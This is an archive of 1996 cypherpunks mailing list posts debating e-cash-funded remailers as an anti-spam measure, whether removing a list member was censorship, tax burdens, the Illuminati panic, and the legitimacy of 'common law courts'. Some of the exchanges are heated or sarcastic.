> implementation of this idea, but now that I've re-read the posts, I'm confused
> in another way.  It seems this feature only applies to mail forwarded through
> a remailer.

While at first this may seem awkward, it's actually a feature because
the remailer operator handles the e-cash and cuts a check once in awhile.

This has the effect of converting a "victim" who hates remailers into
a person who loves spam and loves remailers.  This makes it harder to
outlaw anonymity or impose Dyson-style "limited" anonymity.  Plus, it's
just a good business practice.

> As mentioned on several posts, which may be the main idea, this
> would reduce the amount of noise submitted to lists.  This would be a good
> thing, for sure.  Knowing that your useless messages are costing even $.25
> would be enough to cut down drastically on spam.

And, for people who get their kicks out of spamming people they don't like
it must be galling to have to pay their "victim" money for the privilege!

> However, I still don't see how this is to be implemented for direct email.

Once again, I seem to have combined several ideas in a confusing way.
Initially, I was talking about how a remailer operator would solve his
problem of people abusing the remailer and creating enemies for him
and for remailers in general.  I think it is clear that this solves
the problem.

Once such a feature is in existence, how else could it be used?

That's what the rest of my message was really about.

> How would this work for an entity sending email directly to your account,
> rather than through a remailer?

This assumes that spam has gotten so bad that everybody filters their
mail and only accepts mail on the "accept" list.  People sending mail
directly to your account would get a message back saying that they had
to get on the "free" list or send their mail through one of the approved
remailers.

> The solutions that come to mind are 1) get new mail software which performs
> this filtering/charging...

It is much easier to let the remailer operator hassle with the cash.
Mail software which handles e-cash well is going to take awhile and it
introduces a lot of very real security issues.

Filtering is already widely available in mail programs.  And, it can
be front ended to anything with procmail.

> and 2) have an autoreply that sends mail not sent
> through your "post office" back to the sender with a note saying to route
> it through the "post office."  This "post office" would be much like with
> snail mail.  All it does is collect and redistribute mail (for a small fee,
> of course... :-)  This would be a good business proposition, indeed.  However,
> I don't know how widely accepted it would be.

I don't think you'd necessarily want to route all of your mail through
the post office, just mail which isn't on your "free" list.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Thu, 14 Nov 1996 10:29:17 -0800 (PST)
To: "Mark M." <markm@voicenet.com>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611141828.KAA20695@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. writes:
> On Wed, 13 Nov 1996, Dave Hayes wrote:
> > Logically, we must conclude that those who frequently and repeatedly
> > cry for the censorship or removal of any source of input from
> > cyberspace are either:
> > 
> > 	-quite clueless about the tools at their disposal
> > 	-ideologically or personally opposed to the source of input
> > or	-in need of large amounts of attention from others
> You are misinformed.  Vulis was _not_ prevented from posting to cpunks, thus
> no source of input was removed.  He was simply removed from the distribution
> list.  He can still read and post to the list.

Go back and reread at this time. Notice that I didn't mention *who*
was censored. The error of interpretation was the initial story's 
slant on censorship. I merely expounded on the *story's* slant. 

> The messages were, in addition to being "nasty", extremely off-topic.
> "Off-topic" is much less subjective than "nasty".

But still subjective, and hence still subject to political
availability should the need to criticize Vulis arise.

> > Just as suddenly, the classic anti-free-speech arguments of "if you
> > don't like it, start yer own" begin to surface. (Anyone ever notice
> > how this resembles the "love it or leave it" mentality of certain
> > American patriotic organizations?)
> Governments maintain a monopoly on land, so the "love it or leave it" mentality
> is flawed.  Virtual space does not have the same limitations as physical
> space.  Starting your own mailing list is relatively easy.

For me, yes. Not for most people. I take it you expect *everyone* to
have a UNIX machine connected to the net to ensure free speech? 

> > Notice that the net is compared to a home or private club. Actually
> > the net is neither, however that would not serve the purposes of this
> > analogy, so this fact is convienently forgotton. 
> Is the net analogous to a country?  If not, then why did you compare starting
> a mailing list to moving to a different country?

I didn't. (and here we go...)

> > Mr. Gilmore, and other like minded parties, might want to consider
> > what would happen if one parent company owned *all* communications
> > media. Would they they be so supportive of the ideology of ownership
> > and communciation they espouse?
> And just how plausible do you think this is?  

The plausibility is not in question, the example is meant to
illustrate the ludicrousness of the "ownership" concept when applied
to public mailing lists (and by extension *any* public media).

Are you saying "since this is implausible, the point is invalid"? 
We'll both have fun with that one. 

> I believe it is next to impossible, unless it is the result of
> government regulation.

AT&T tried it. They were just unlucky. 
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

       Self justification is worse than the the original transgression.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Thu, 14 Nov 1996 10:32:23 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611141831.KAA20729@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Igor "Gadzooks" Chudov writes:
> Dave Hayes wrote:
> > You won't do this, because I won't let you on the list. I, unlike you
> > or Mr. Gilmore, have the judgement on whom to invite to my list.
> So what's the difference between yours and gilmore's position?

Simple. I choose whom to invite to my parties. Gilmore provides an
open door.

> Long live USENET Cabal!

Neither life nor death, neither good nor bad, neither left nor right,
none of these things to the USENET Cabal. 
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

           Real charity doesn't care if it's tax-deductible or not.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 14 Nov 1996 10:36:42 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611141831.KAA20729@kachina.jetcafe.org>
Message-ID: <Pine.GSO.3.95.961114103529.4170F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Isn't choosing who to invite to your parties, or to invite on your mailing
list, an act of private censorship? "Freedom" Knights, indeed.

-Declan



On Thu, 14 Nov 1996, Dave Hayes wrote:

> Igor "Gadzooks" Chudov writes:
> > Dave Hayes wrote:
> > > You won't do this, because I won't let you on the list. I, unlike you
> > > or Mr. Gilmore, have the judgement on whom to invite to my list.
> > So what's the difference between yours and gilmore's position?
> 
> Simple. I choose whom to invite to my parties. Gilmore provides an
> open door.
> 
> > Long live USENET Cabal!
> 
> Neither life nor death, neither good nor bad, neither left nor right,
> none of these things to the USENET Cabal. 
> ------
> Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> 
>            Real charity doesn't care if it's tax-deductible or not.
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Thu, 14 Nov 1996 10:42:58 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: Re: "Freedom Knights" are closet censors
Message-ID: <199611141842.KAA20786@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> What is "censoring other people's censorship?" 

The act of preventing censorship. You are supposed to be capable at
language, why can't you figure this out.

> Say I argue in favor of the CDA. Would you censor me then? Why not?
> Isn't this censoring others censorship?

Nope. If you sent cancel messages out on USENET for Anti-CDA people,
however, then you would fall under my "censorship". If you somehow
caused mail messages to be deleted in people's mailboxes, I would
find a way to stop that. 

But you can argue all you want. Go ahead, I grant you that permission.
8-)

> I wonder why the so-called "Freedom Knights" are so insecure in their
> beliefs that they will not tolerate a dissenting voice on their mailing 
> list. (Let's forget for the moment that my point in subscribing was to
> disrupt it. That's not the point, is it? "More speech, more
> speech!")

Sorry, that *is* the point. If you tell me you are going to disrupt
the list, I am not going to let you on the list...even though you
are easily ignored. 

Why? 

Consider who is on this list. Dr. Vulis. John "No One Can Handle Me"
Grubor. Steve Boursy. These are people who you can *not* annoy, trust
me. 

No, this is for your benefit much more than ours.  The damage you will
do to yourself is far greater than the damage you will do to our list.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

Wisdom (n.) - 1. Something you can learn without knowing it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apache <apache@quux.apana.org.au>
Date: Wed, 13 Nov 1996 16:11:30 -0800 (PST)
To: Gary Howland <gary@systemics.com>
Subject: Re: Taxation Thought Experiment
In-Reply-To: <199611131240.NAA19255@internal-mail.systemics.com>
Message-ID: <Pine.LNX.3.91.961114103151.10289A-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Gary Howland wrote:

> > o TAXES THOUGHT EXPERIMENT
> > 
> >  1) I generate $100 of productivity for my company
> >  2) Company is taxed %30, $70 left
> >  3) Company pay shareholders and costs, $30 is left
> >  4) Company pays me
> >  5) I pay 40% in taxes, so $18 left
> >  6) With $18 I can buy a $16.82 object (%07 sales tax).
> > 
> > Results:
> >  1) I see $16.82 realization from $100 productivity increase.
> >  * Govt. gets $49.26 of my productivity, or nearly 3 times the amount I get.
> 
> The government gets $59.26, not $49.26 (30+16+12+1.26).
> That leaves you with 16.74 (not 16.82) - they get nearly four
> times as much.
> 
> In other countries the situation may be worse, not only due to different
> rates of tax, but because of social security contributions, employers tax,
> and the like.

... fuel tax, land tax, land rates, enviromental levy, gun buyback 
surcharge, 100% tabaco tax, alcohol tax, vehicle registrations, new tyre 
tax, licences & permits, sales tax, payroll tax, dog tax, airport exit 
tax, drivers tax, compulsory workers compensation tax, superannuation 
tax, medicare tax, income tax, capital gains tax, national parks tax, 
luxury goods tax (funnily enough bras are included as luxury 
goods..what'dya think girls?) ... just to name a few..a very few 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 14 Nov 1996 10:49:38 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: "Freedom Knights" are closet censors
In-Reply-To: <199611141842.KAA20786@kachina.jetcafe.org>
Message-ID: <Pine.GSO.3.95.961114104601.22840A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 14 Nov 1996, Dave Hayes wrote:

> Sorry, that *is* the point. If you tell me you are going to disrupt
> the list, I am not going to let you on the list...even though you
> are easily ignored. 

And if Vulis shows Gilmore, though his actions, that he is going to
disrupt cypherpunks, Vulis can be prevented from being on the list...even
though he is easily ignored.

The freedom you, Dave, are exercising as owner and perhaps moderator of
freedom-knights, is precisely the same freedom that Gilmore should and
does enjoy.

That's why neither of your actions is, in truth, "censorship."

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Thu, 14 Nov 1996 10:57:49 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611141857.KAA20984@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> Dave Hayes wrote:
> > Igor "Gadzooks" Chudov writes:
> > > Dave Hayes wrote:
> > > > You won't do this, because I won't let you on the list. I, unlike you
> > > > or Mr. Gilmore, have the judgement on whom to invite to my list.
> > > So what's the difference between yours and gilmore's position?
> > Simple. I choose whom to invite to my parties. Gilmore provides an
> > open door.
> Providing an open door does not mean that it is always open to everyone, 
> Dave. It only means that it is open to all by default, but that policy
> can be reversed for certain individuals. That is not to say that I agree
> with Gilmore's the decision to kick Vulis out from cypherpunks, but John's
> decision was neither dishonorable nor he was acting outside his powers,
> in my opinion.

Technically, John Gilmore did nothing, since Vulis continues to read
and post. Symbolically, he punched holes in his ideology. That's my
opinion.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

 You need not wonder whether you should have a reliable person as a friend. 
               An unreliable person is nobody's friend.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Thu, 14 Nov 1996 11:03:41 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: Re: "Freedom Knights" are closet censors
Message-ID: <199611141903.LAA21067@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> On Thu, 14 Nov 1996, Dave Hayes wrote:
> > Sorry, that *is* the point. If you tell me you are going to disrupt
> > the list, I am not going to let you on the list...even though you
> > are easily ignored. 
> And if Vulis shows Gilmore, though his actions, that he is going to
> disrupt cypherpunks, Vulis can be prevented from being on the list...even
> though he is easily ignored.

Ah, but that's after the fact of the invite. 

> That's why neither of your actions is, in truth, "censorship."

Now you are starting to make some sense. So why did you write an
editor..er...article that focused on his "censorship"?
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

Nasrudin loaded his donkey with wood for the fire and instead of sitting in 
its saddle, sat astride one of the logs.
"Why don't you sit in the saddle?" someone asked.
"What? And add my weight to what the poor animal has to carry? My weight is 
on the _wood_ and it is going to stay there."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 14 Nov 1996 11:09:50 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: "Freedom Knights" are closet censors
In-Reply-To: <199611141903.LAA21067@kachina.jetcafe.org>
Message-ID: <Pine.GSO.3.95.961114110653.26583C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


After the fact of the invite doesn't make a difference for the purpose of
our analysis.

I wrote about this (in a column, BTW) because it was an interesting story.

-Declan



On Thu, 14 Nov 1996, Dave Hayes wrote:

> > On Thu, 14 Nov 1996, Dave Hayes wrote:
> > > Sorry, that *is* the point. If you tell me you are going to disrupt
> > > the list, I am not going to let you on the list...even though you
> > > are easily ignored. 
> > And if Vulis shows Gilmore, though his actions, that he is going to
> > disrupt cypherpunks, Vulis can be prevented from being on the list...even
> > though he is easily ignored.
> 
> Ah, but that's after the fact of the invite. 
> 
> > That's why neither of your actions is, in truth, "censorship."
> 
> Now you are starting to make some sense. So why did you write an
> editor..er...article that focused on his "censorship"?
> ------
> Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> 
> Nasrudin loaded his donkey with wood for the fire and instead of sitting in 
> its saddle, sat astride one of the logs.
> "Why don't you sit in the saddle?" someone asked.
> "What? And add my weight to what the poor animal has to carry? My weight is 
> on the _wood_ and it is going to stay there."
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Thu, 14 Nov 1996 08:09:45 -0800 (PST)
To: "Peter Hendrickson" <ph@netcom.com>
Subject: RE: Remailer Abuse Solutions
Message-ID: <n1364152460.4153@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


First of all, I would like to apologize if it looked like I accused Peter of
being involved with a conspiracy.  I have communicated with him privately 
concerning this matter, and am now making my public apology.  Thanks!

Concerning my other statements, I think I was a little confused on the 
implementation of this idea, but now that I've re-read the posts, I'm confused
in another way.  It seems this feature only applies to mail forwarded through
a remailer.  As mentioned on several posts, which may be the main idea, this
would reduce the amount of noise submitted to lists.  This would be a good 
thing, for sure.  Knowing that your useless messages are costing even $.25 
would be enough to cut down drastically on spam.  However, I still don't see
how this is to be implemented for direct email.  How would this work for an
entity sending email directly to your account, rather than through a remailer?
The solutions that come to mind are 1) get new mail software which performs
this filtering/charging and 2) have an autoreply that sends mail not sent
through your "post office" back to the sender with a note saying to route
it through the "post office."  This "post office" would be much like with
snail mail.  All it does is collect and redistribute mail (for a small fee,
of course... :-)  This would be a good business proposition, indeed.  However,
I don't know how widely accepted it would be.  

Comments?  Am I missing the point?  

PM

USER ERROR:  REPLACE AND STRIKE ANY KEY WHEN READY






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 14 Nov 1996 08:23:08 -0800 (PST)
To: declan@well.com
Subject: Re: Babble about universal service
Message-ID: <3.0b36.32.19961114110638.0074df70@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:43 AM 8/8/96 -0700, Declan McCullagh wrote:

>(My objections to universal service are perhaps not surprising. It
>devolves more power into the hands of the DC bureaucrats such as the FCC,
>and provides a slippery slope on which we can slide down towards more and
>more government regulation. By concentrating regulatory authority in the
>Federal government, it also makes decisions more subsceptible to
>special-interest lobbying and political patronage. But I recall Ronda has
>been arguing for universal service for some time now, including on the
>netizens mailing list.)

It also lets the Feds say, "You can't have something until everyone has
it."  Besides we have universal service right now (in America anyway).
Much more universal service than the Feds would have provided with decades
of bureaucratic futzing around.  Anyone in the US who wants to get wired
can do so for very little money.  All it takes is desire.  The government
can't provide the desire.

  

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Thu, 14 Nov 1996 08:25:43 -0800 (PST)
To: Rich Graves <rcgraves@ix.netcom.com>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
In-Reply-To: <32892276.4439@ix.netcom.com>
Message-ID: <Pine.SUN.3.95.961114110208.13209P-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Actually, I have always had a soft spot for the Bavarian Illuminati.

Those wanting to know more should find a good university library and look
at:

Vernon Stauffer, New England and the Bavarian Illuminati (published in
1918 -- you won't find this in your bookstore....)

Amazingly, the whole original Bavarian Illuminati panic was set off in
1798 in a single sermon given by Reverend Jedeidiah Morse on May 9, 1798,
based on his reading of John Robison's 1797 book, Proofs of a Conspiracy
Against All the Religions and Governments of Europe.

It's really an incredible piece of US social history and I think tells us
a lot about the national temper then and now.

The national panic over this early "reds under the beds" lasted almost two
years!  No one ever found any Illuminati in the US...

On Tue, 12 Nov 1996, Rich Graves McElwained thusly:

> But Professor Froomkin, you are igNORING the inFLUENCE of the ILLUMINATI 
> and the BILDERBERGERS. The same source that supplied this imPORTANT 
> information about the FED tells us the TRUTH in an earlier missive. Mere 
> "legality" and mere "facts" are NOT at issue here.
> 
> http://www.hevanet.com/nitehawk/nwo4.html
> 
> |ADAM WISEHOPHF, Professor at Germany's Ingolstadt University, founded 
> |The Order of the Illuminati on May 1, 1776. This man designed the very
> |plan of world domination that is still in use today to enslave the 
> |world's masses. Here, upon establishing his "Order of the Illuminati", 
> |he smugly reflects on his "conning" the gullible Christians of his day,
> |saying: 
> |
> |"The most wonderful thing of all is that the distinguished Lutheran and 
> |Calvinist theologians who belong to our order really believe that they 
> |see in it (Illuminati) the true and genuine sense of Christian 
> |Religion. Oh mortal man, is there anything you cannot be made to 
> |believe?" 
> |
> |Evidently not! And a high percentage of Christians today are still 
> |being conned in the same way. One prime example of this are the 
> |millions of Christians, and most church denominations, who have fallen 
> |for the NWO plan of a "One World RELIGION", being spearheaded by the 
> |United Nations' National and World Counsel of Churches, behind the 
> |battle cry of ecumenicalism. 
> |
> |Watch the future and we will see only small groups of spiritual Ameri- 
> |cans, who will resist following the millions of "religious" lambs to 
> |the slaughter. The Lord of the Bible always warned His people to never 
> |follow the MULTITUDE. 
> 
> As everyone on cypherPUNKS KNOWS, to every conspiracy theory there IS a 
> grain of TRUTH. We as a people MUST understand the TRUTH and fulfill our 
> DESTINY. FREE AMERICA! http://www.nswpp.org/
> 
> > > Or am I just making that common but incorrect assumption that
> > > unconstitutionality entails illegality?
> > 
> > No, I'm afraid you are making the common but incorrect assumption that
> > reading some part of one court case from the dustbin of history out of
> > context makes you a constitutional expert.
> 
> I seriously doubt he believes that. Or anything else he's spouting off 
> about.
> 
> > > Thanks for responding to this thread, Michael.  Your input is very
> > > much valued.
> > 
> > You may feel differently as I get grumpier...
> 
> Believe me, you're being far too kind.
> 
> -rich
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | Great weather here. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 14 Nov 1996 08:31:06 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: "Freedom Knights" are closet censors
In-Reply-To: <Pine.GSO.3.95.961114070057.11045F-100000@well.com>
Message-ID: <Pine.LNX.3.95.961114112458.14518A-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Nov 1996, Declan McCullagh wrote:

> Date: Thu, 14 Nov 1996 07:04:35 -0800 (PST)
> From: Declan McCullagh <declan@well.com>
> Reply-To: freedom-knights@jetcafe.org
> To: Dave Hayes <dave@kachina.jetcafe.org>
> Cc: freedom-knights@jetcafe.org, cypherpunks@toad.com
> Subject: Re: "Freedom Knights" are closet censors 
> 
> What is "censoring other people's censorship?" Say I argue in favor of the
> CDA. Would you censor me then? Why not? Isn't this censoring others
> censorship?
> 
> I wonder why the so-called "Freedom Knights" are so insecure in their
> beliefs that they will not tolerate a dissenting voice on their mailing 
> list. (Let's forget for the moment that my point in subscribing was to
> disrupt it. That's not the point, is it? "More speech, more speech!")
> 
> -Declan
> Founder, Boycott Freedom Knights society, Washington, DC chapter
> 
> 
> On Wed, 13 Nov 1996, Dave Hayes wrote:
> 
> > > The so-called "Freedom Knights" have censored me from their mailing list.
> > > Dave Hayes refuses to let me subscribe and read and contribute to the
> > > discussions there. Why? Simply because he doesn't like what I have to say.
> > > I might criticize him. Truly, censorship says more about the censor than
> > > the censored. 
> > 

No dude, like Dave said, you have to know who to invite to
the Party, since you are responsible for the conduct of all
of your guests.

> > Notice that I now have you arguing -my- side of the argument. Are you
> > so easily controlled? Have you asked yourself why you are that way? 
> > 
> > > John Gilmore, on the other hand, has been much more tolerant. He allows
> > > anyone to subscribe to cypherpunks and only kicked one person off after
> > > months of ranting and off-topic drivel.
> > 

But John Gilmore and his EFF are the epitome of a corrupt
special interest group, and he will now be forever remembered
as one who "pulls-plugs."


> > An ineffective move with symbolic complications that affect no one but
> > him. Why do you support this? 
> > 
> > > And I wonder why the Freedom Knights want to censor certain newsgroups. As
> > > in their FAQ, where they condemn speech they don't like on the alt.cancel
> > > and alt.nocem newsgroups and advise operators not to carry such
> > > groups. 
> > 
> > Ah, you finally got the newsgroups right. Good. 
> > 

alt.cancel and alt.nocem are both censorous newsgroups that
should be quashed.

> > I censor other people's censorship. That is what I do. Call me a
> > censor if you will, but if you were truly in support of free speech
> > you would understand. Since you don't, your cry of wolf demonstrates
> > the depth of your consideration of the subject matter.
> > 
> > > I think it's time to lift the veil from this public Net-menace!
> > 
> > Knock ya-self out.
> > 
> > > Founder, Boycott Freedom Knights society, Washington, DC chapter
> > 
> > You -do- realize, of course, that you have to organize the people
> > and create a large group of opposers to my cause.
> > 
> > That is your destiny. Carry it out.
> > ------
> > Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> > Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> > 
> > Nasrudin arrived at an all-comers horse race mounted on the slowest of oxen.
> > Everyone laughed, an ox cannot run. 
> > "But I have seen it, when it was only a calf, running faster than a horse.",
> > said Nasrudin. "So why should it not run faster, now that it is larger?"
> > 

Let's stay on topic here -- John Gilmore is a censorous asshole
for pulling Vulis's plug.  The topic has nothing to do with
the Freedom-Knights.

-a





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Thu, 14 Nov 1996 08:40:29 -0800 (PST)
To: Dale Thorn <cypherpunks@toad.com
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <328AD670.4EDD@gte.net>
Message-ID: <9611141645.AA01354@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>"It doesn't exist".  Well!  The difference between the intent of the law
>and the "letter" of the law:  The Constitution, if it is about anything,
>it is about Balance of Power. 

Since it accepts slavery in its original form the "intent" as you put
it is probably not acceptable to you. Unless of course you spend
your weekends with a pillowcase on your head.

>An afterthought?  No.  The Constitution was a document provided at the
>behest of the States, with their approval (not dictated by the Feds), and
>those States would not ratify said document without the Enumeration of
>rights now referred to as the Bill of Rights. 

Actually there was a long and protracted debate over whether or not to
include the bill of rights in the constitution. A constitution is simply
a description of the process and organisation of government, usually in
the broadest terms. The problem with the bill of rights at the time of
the discuissions was enforcement. The role of the supreme court as
arbiter of the constitution was not originally planned. If anyone had
predicted that such a role would emerge it would have been seen as 
undesirable since it would compromise the judicial/legislative 
separation.

Incidentally one of the original gripes of the revolution was the 
type of recourse to unwritten proceedure and laws that happened
in the colonial period. That is why there was a demand for a clear
statement of the constitutional arrangements. If jefferson and so 
wanted private kangeroo courts they would have written it down.


		Phill










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 14 Nov 1996 11:41:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611140916.BAA24474@Networking.Stanford.EDU>
Message-ID: <yc8DXD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Richard Charles Graves <llurch@networking.stanford.edu> writes:
> >Man you're nutts. There are very few and quite vast Media Companies
> >in the world, and they're on the verge of becoming monopolies.
> >
> >Even your American President is in reality a puppet of the Trilateral
> >Commission, who effectively also control CNN, the Washington Post,
> >and many many many other things all over the world.
> 
> You're so naive. The Trilateral Commission is just a puppet of General
> Electric, the British Royal Family, the Illuminati, the Council on Foreign
> Relations, the Elders of Zion, the Knights Templar, the Military-
> Industrial Complex, the Communists, the Secret Government, Dead White
> Males, the Freemasons, the CIA, Scientology, and my Aunt Marge.

And the Kook Cabal.

> 
> -rich
>  special agent, zog northwest
>  i do not speak for the world affairs council


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 14 Nov 1996 11:43:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <Pine.SUN.3.94.961113155458.2905D-100000@polaris>
Message-ID: <NH8DXD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
> The bottom line is that the decision to sue is much like the decision to
> use a legal tax loop.  I would call "idiot" the person who refused to
> utilize that which the government hands him. (Did not Mr. May indicate
> that the $1000.00 or so that the government would hand him was too costly
> to lose, even in the face of estlablishing privacy for his children?  In
> my view that is a rational decision.  Mr. May has priced privacy.  My
> objection to his rationale was that I think the cost of obtaining it can
> be significantly lower).

And I call Timmy May a raving idiot and a censor.


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Thu, 14 Nov 1996 09:09:29 -0800 (PST)
To: jim bell <cypherpunks@toad.com
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <199611140552.VAA09808@mail.pacifier.com>
Message-ID: <9611141714.AA01374@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>As for the "self-selected" issue:  In almost all areas of human endeavor, 
>things are (often?  usually?) done by people who are "self-selected."  I 
>suggest that there is simply no reason that even "self-selected" courts 
>cannot work.

Oh I forgot to mention, last week we found you guilty of sedition, it
was a pity you were not present to put your case but maybe if you had 
bothere to read the court roster you would have attended.

You are allowed to put your case in person at the sentencing hearings
if you like but since its a mandatory sentence you would probably
prefer an appeal.


	Phill

>1.  Commonlaw courts predate the US Constitution by a few hundred years.  
>The former does not depend on the latter for authority or credibility.  

Untrue, the US constitution replaced all previous constitutions. Thats
what the supremacy clause is all about. All previously existing courts
were extinguished.

>2.  The US Constitution is, at most, a statement of the authority of the 
>FEDERAL portion of government.

It also includes a supremacy cluase and a "due process" clause. The
due process clause means amongst other things that noone can be subjected 
to proceedings that are not authorised under the constitution.

>3. The Federal Constitution only references states, and I don't think it 
>references state Constitutions at all.

There is no logical reason why it should, if a state exists it has a process
of government, a boundary to its authority and performs legislative,
excutive and judicial functions. The explicit recognition of the states
was necessary since otherwise the supremacy clause would claim to extinguish
their rights. The authority of the states to make law is explicitly 
stated. It is also implicit in the use of the term "state" rather than 
"county".

>You should have said, SOME courts.  Not "the courts," implying ALL the 
>courts.  Notice that the US Federal Constitution (at least, to my 
>recollection) does not describe or regulate state courts, or for that matter 
>local courts.

It recognises the states, and thus their constitutions. If you can find 
a state which omitted a supremacy clause from its constitution then you
might have a point.


As a practical matter however the immediate effect of claiming to issue
proceedings under "common law courts" is from now on almost certain to 
be criminal and civil proceedings followed by long jail sentences.

While Jim Bell can pick nits and pretend that he is a lawyer the people
recognised as lawyers in our society act in a different matter. It is 
an empirical fact that those convicted in federal and state courts
go to jail, those convicted in "common law kangeroo courts do not". In
fact the only people who do are the judges, jurors and other 
instigators.


It is an empirical fact that the authority of "common law" courts 
is not recognised by society. They can be dealt with easily enough,
the intended victim need only apply to a real court for an injuction
prohibiting proceedings, turn up to the "court" to serve the injunction
and if people insist on proceeding apply to the real court for 
enforcement of the original order since anyone participating in the 
"common law court" would then be in contempt. 


	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 14 Nov 1996 10:42:55 -0800 (PST)
To: dave@kachina.jetcafe.org (Dave Hayes)
